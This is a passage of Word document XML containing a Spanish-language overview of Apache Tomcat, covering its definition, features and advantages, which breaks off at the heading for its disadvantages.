        <w:spacing w:line="100" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="00000A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00850F64">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="100" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="00000A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00850F64">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="100" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="00000A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00850F64">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="100" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="00000A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00850F64">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="100" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="00000A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00E72E03">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="00000A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00E72E03">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251670528" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="53F42C5E" wp14:editId="5956F8B9">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>2017585</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>364490</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1659890" cy="1104900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="5" name="Imagen 5" descr="Resultado de imagen para Tom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TomCa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59890" cy="1104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50F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>TomCat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00E72E03">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00850F64">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00850F64">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRDefault="0041791B" w:rsidP="0041791B">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00850F64" w:rsidRPr="00850F64">
        <w:t xml:space="preserve">Tomcat es un contenedor de servlets que se utiliza en la Referencia oficial de la implementación para Java </w:t>
      </w:r>
      <w:r w:rsidR="00F023A5" w:rsidRPr="00850F64">
        <w:t>Servet</w:t>
      </w:r>
      <w:r w:rsidR="00850F64" w:rsidRPr="00850F64">
        <w:t xml:space="preserve"> y JavaServer Pages (</w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:tgtFrame="_blank" w:tooltip="Definición JSP" w:history="1">
        <w:r w:rsidR="00850F64" w:rsidRPr="0041791B">
          <w:t>JSP</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00850F64" w:rsidRPr="00850F64">
        <w:t xml:space="preserve">). Las especificaciones Java Servlet y </w:t>
      </w:r>
      <w:r w:rsidR="00F023A5">
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidR="00F023A5" w:rsidRPr="00850F64">
        <w:t>Server</w:t>
      </w:r>
      <w:r w:rsidR="00850F64" w:rsidRPr="00850F64">
        <w:t xml:space="preserve"> Pages son desarrolladas por Sun Microsystems cuyas especificaciones vienen dadas por la JCP (Java Community Process). Apache Tomcat es desarrollado en un entorno abierto y participatorio, bajo la licencia de Apache Software License.</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="175397872"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00F50132">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00F50132">
            <w:instrText xml:space="preserve"> CITATION AJD18 \l 2058 </w:instrText>
          </w:r>
          <w:r w:rsidR="00F50132">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="009E53AE">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> (AJDP Soft, 2018)</w:t>
          </w:r>
          <w:r w:rsidR="00F50132">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="0041791B" w:rsidRPr="00850F64" w:rsidRDefault="0041791B" w:rsidP="0041791B"/>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="0041791B" w:rsidP="0041791B">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00850F64">
        <w:t>Apache,</w:t>
      </w:r>
      <w:r w:rsidR="00850F64" w:rsidRPr="00850F64">
        <w:t xml:space="preserve"> también conocido como simplemente Tomcat o </w:t>
      </w:r>
      <w:r w:rsidR="00F023A5" w:rsidRPr="00850F64">
        <w:t xml:space="preserve">Jackarta </w:t>
      </w:r>
      <w:r w:rsidR="00850F64" w:rsidRPr="00850F64">
        <w:t xml:space="preserve">Tomcat, es un servidor web </w:t>
      </w:r>
      <w:r w:rsidR="00F023A5" w:rsidRPr="00850F64">
        <w:t>multiplataforma</w:t>
      </w:r>
      <w:r w:rsidR="00850F64" w:rsidRPr="00850F64">
        <w:t xml:space="preserve"> que funciona como contenedor de servlets y que se desarrolla bajo el proyecto denominado Jackarta perteneciente a la </w:t>
      </w:r>
      <w:r w:rsidR="00850F64" w:rsidRPr="0041791B">
        <w:t>Apache Software Foundation</w:t>
      </w:r>
      <w:r w:rsidR="00850F64" w:rsidRPr="00850F64">
        <w:t xml:space="preserve"> bajo la licencia Apache 2.0 y que implementa las especificaciones de los servlets y de JavaServer Pages o JSP de Sun Microsystem. Dicho servidor es mantenido y desarrollado por miembros de la fundación y voluntarios independientes, los cuales tienen libre acceso al código fuente bajo los </w:t>
      </w:r>
      <w:r w:rsidR="00850F64" w:rsidRPr="00850F64">
        <w:lastRenderedPageBreak/>
        <w:t>términos establecidos por la </w:t>
      </w:r>
      <w:r w:rsidR="00850F64" w:rsidRPr="0041791B">
        <w:t>Apache Software Foundation.</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1008288296"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00F50132">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00F50132">
            <w:instrText xml:space="preserve"> CITATION Apa18 \l 2058 </w:instrText>
          </w:r>
          <w:r w:rsidR="00F50132">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="009E53AE">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> (Apache foundation, 2018)</w:t>
          </w:r>
          <w:r w:rsidR="00F50132">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00850F64">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EAF4F9"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00613992">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>Características</w:t>
      </w:r>
      <w:r w:rsidR="00613992">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Autenticación de acceso básico</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Negociación de credenciales</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>HTTPS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Alojamiento compartido</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>CGI o interfaz de entrada común</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Servlets de Java</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>SSI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Consola de administrador</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00850F64">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00613992">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>Ventajas</w:t>
      </w:r>
      <w:r w:rsidR="00613992">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Interoperabilidad entre aplicaciones y plataformas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Fomentan los estándares y protocolos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Al apoyarse en HTTP, se puede aprovechar la seguridad de firewall sin necesidades de cambiar las reglas de filtrado.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Integración de servicios ubicados lejos geográficamente. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Es una tecnología ya asentada</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Es bastante ligero con respecto a otros competidores. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Al estar escrito en Java lo hace muy compatible para su uso.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00D84859">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Siendo más ligero tiene menos complejidad y uso de recursos así como de modularidad. </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:eastAsia="Calibri"/>
            <w:color w:val="00000A"/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:id w:val="-1358735544"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00F50132">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri"/>
              <w:color w:val="00000A"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00F50132">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri"/>
              <w:color w:val="00000A"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION Ent15 \l 2058 </w:instrText>
          </w:r>
          <w:r w:rsidR="00F50132">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri"/>
              <w:color w:val="00000A"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="009E53AE" w:rsidRPr="009E53AE">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri"/>
              <w:noProof/>
              <w:color w:val="00000A"/>
            </w:rPr>
            <w:t>(Entre Desarrolladores, 2015)</w:t>
          </w:r>
          <w:r w:rsidR="00F50132">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri"/>
              <w:color w:val="00000A"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00850F64">
      <w:pPr>
        <w:spacing w:line="100" w:lineRule="atLeast"/>
        <w:ind w:left="1440"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:sz w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRDefault="00850F64" w:rsidP="00850F64">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BB6F0B" w:rsidRPr="00850F64" w:rsidRDefault="00BB6F0B" w:rsidP="00850F64">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES" w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00850F64" w:rsidRPr="00850F64" w:rsidRDefault="00850F64" w:rsidP="00880390">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850F64">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Desventajas</w:t>
      </w:r>
      <w:r w:rsidR="00BB6F0B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
